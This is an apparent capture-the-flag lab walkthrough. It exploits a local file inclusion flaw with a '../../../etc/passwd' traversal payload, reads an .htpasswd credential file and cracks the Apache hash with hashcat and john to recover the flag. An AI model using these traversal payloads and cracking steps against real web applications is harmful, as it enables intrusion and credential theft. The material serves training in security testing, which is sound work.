Step 1: Click on the green button to Start the Lab
Step 2: Hack the URL or IP of the lab
Step 3: Use your skills and logic to find the flags!
?page=about
?page=../../../etc/passwd
to test for LFI (note: this will work because the else clause doesn't append .php)?page=admin/.htaccess
AuthType Basic
AuthName "Admin Area"
AuthUserFile /var/www/html/admin/.htpasswd
Require valid-user
?page=admin/.htpasswd
admin:$apr1$Ewv3fbgh$0ehlEITBv79FOVqbOtsoc/
# Ubuntu/Debian:
sudo apt-get install hashcat
# macOS (with Homebrew):
brew install hashcat
# Windows:
# Download from https://hashcat.net/hashcat/
# Ubuntu/Debian:
sudo apt-get install john
# macOS (with Homebrew):
brew install john
# Windows:
# Download from https://www.openwall.com/john/
# Create a file with the hash
echo "admin:$apr1$Ewv3fbgh$0ehlEITBv79FOVqbOtsoc/" > hash.txt
# Use hashcat with Apache MD5 mode (-m 1600)
hashcat -m 1600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
# Or with a smaller wordlist for testing
hashcat -m 1600 -a 0 hash.txt /usr/share/wordlists/common_passwords.txt
# Create a file with the hash
echo "admin:$apr1$Ewv3fbgh$0ehlEITBv79FOVqbOtsoc/" > hash.txt
# Use john with wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
# Or with a smaller wordlist for testing
john --wordlist=/usr/share/wordlists/common_passwords.txt hash.txt
# You can also use online tools like crackstation.net
# Just paste the hash: $apr1$Ewv3fbgh$0ehlEITBv79FOVqbOtsoc/
password123
The flag is: password123
Sign-in to your account to access your hacking courses and cyber security labs.
Access all hacking courses and cyber security labs.